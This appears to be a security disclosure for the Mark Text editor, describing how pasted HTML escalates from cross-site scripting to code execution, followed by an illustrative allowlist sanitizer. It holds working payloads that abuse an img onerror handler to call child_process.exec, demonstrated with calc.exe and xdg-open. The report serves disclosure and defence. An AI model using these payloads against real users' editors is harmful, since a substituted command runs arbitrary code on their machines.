Description

An attacker can induce a Mark Text user to copy the HTML below and paste it into the editor, turning a cross-site scripting (XSS) bug into remote code execution.

```html
<!-- for windows -->
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
<!-- for linux (tested with kali) -->
<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>
```

The pasted HTML is inserted into Mark Text's DOM by the source code referenced below, and remote code execution follows when the inline `onerror` handler calls `child_process`.
marktext/src/muya/lib/contentState/pasteCtrl.js, lines 44 to 65 at b029938
Steps to reproduce

Paste the following HTML into Mark Text:

```html
<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>
```

Expected behavior:

HTML should be sanitized before it is pasted into the DOM.

Actual behavior:

There is no HTML sanitization step; the code only checks whether the pasted content is wrapped in `<table>`.

Link to an example:
bandicam.2022-02-08.01-33-25-900-cut.mp4
bandicam.2022-02-08.01-33-25-900.mp4
Versions

- Mark Text v0.16.3
- Windows 11 Version 21H2 (OS Build 22000.469)
- Kali GNU/Linux Rolling 2021.4
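The wrapper-only check described under "Actual behavior", placed beside an allowlisting paste sanitizer, as an added example. This is not Mark Text's code and not the project's eventual fix: the function and constant names are assumptions, and the shape of the `<table>` check is inferred from the report rather than copied from pasteCtrl.js. It runs under plain Node with no DOM. The reason the payload reaches `child_process` at all is that the Electron renderer exposes Node's `require`; beyond sanitizing pasted HTML, an Electron app should run its renderer with `nodeIntegration` disabled and `contextIsolation` enabled so that an XSS cannot escalate to code execution.

```javascript
'use strict';

// Added example, not Mark Text's code. It models the paste path described in the report:
// a wrapper-only check that lets event-handler attributes through, beside an allowlist
// sanitizer that strips them. Runs under plain Node; no DOM is required.

// Constructed inputs: the two payloads from the report.
const PAYLOAD_WINDOWS =
  `<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>`;
const PAYLOAD_LINUX =
  `<table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table>`;

// The check the report describes (assumed shape, not the project's code): it only asks whether
// the pasted HTML is wrapped in <table>...</table>, so the onerror handler passes untouched.
function isTableWrapped(html) {
  const t = html.trim();
  return /^<table[\s>]/i.test(t) && /<\/table>$/i.test(t);
}

// Allowlist for the hardened path. Event handlers (on*) are never allowed, and URL-bearing
// attributes are checked for script schemes before they are kept.
const ALLOWED_TAGS = new Set([
  'table', 'thead', 'tbody', 'tr', 'td', 'th', 'p', 'br', 'b', 'i', 'em', 'strong',
  'ul', 'ol', 'li', 'code', 'pre', 'a', 'img',
]);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt', 'title']) };
const URL_ATTRS = new Set(['href', 'src']);

function isSafeUrl(value) {
  // Reject javascript:, vbscript: and data: URLs; relative and http(s) links pass.
  return !/^\s*(javascript|vbscript|data)\s*:/i.test(value);
}

// Regex tokenizing keeps the example dependency-free; production code should use a
// parser-backed sanitizer such as DOMPurify, which this function only stands in for.
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
const ATTR_RE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

function sanitizeHtml(html) {
  const stripped = html
    // Drop comments, and script/style elements together with their bodies.
    .replace(/<!--[\s\S]*?-->/g, '')
    .replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, '');

  return stripped.replace(TAG_RE, (whole, rawName, rawAttrs) => {
    const name = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) return '';          // unknown element: dropped entirely
    if (whole.startsWith('</')) return `</${name}>`; // closing tags carry no attributes

    const allowed = ALLOWED_ATTRS[name] || new Set();
    const kept = [];
    for (const m of rawAttrs.matchAll(ATTR_RE)) {
      const attr = m[1].toLowerCase();
      const value = m[2] ?? m[3] ?? m[4] ?? '';
      if (attr.startsWith('on') || !allowed.has(attr)) continue; // onerror, onload, ...: gone
      if (URL_ATTRS.has(attr) && !isSafeUrl(value)) continue;    // javascript: links: gone
      kept.push(`${attr}="${value.replace(/"/g, '&quot;')}"`);
    }
    return `<${name}${kept.length ? ' ' + kept.join(' ') : ''}>`;
  });
}

// What each paste path would hand to the editor's DOM.
function pasteVulnerable(html) {
  return isTableWrapped(html) ? html : ''; // raw HTML, handlers included, goes straight in
}
function pasteHardened(html) {
  return sanitizeHtml(html);               // only allowlisted tags and attributes survive
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log('vulnerable:', pasteVulnerable(PAYLOAD_WINDOWS));
  console.log('hardened:  ', pasteHardened(PAYLOAD_LINUX));
}
```

The point to take from the two paths is that the wrapper check is not a security boundary: any `<table>` that contains an element with an `on*` attribute passes it, whereas an allowlist decides per tag and per attribute what may reach the DOM and rejects everything it has not explicitly approved.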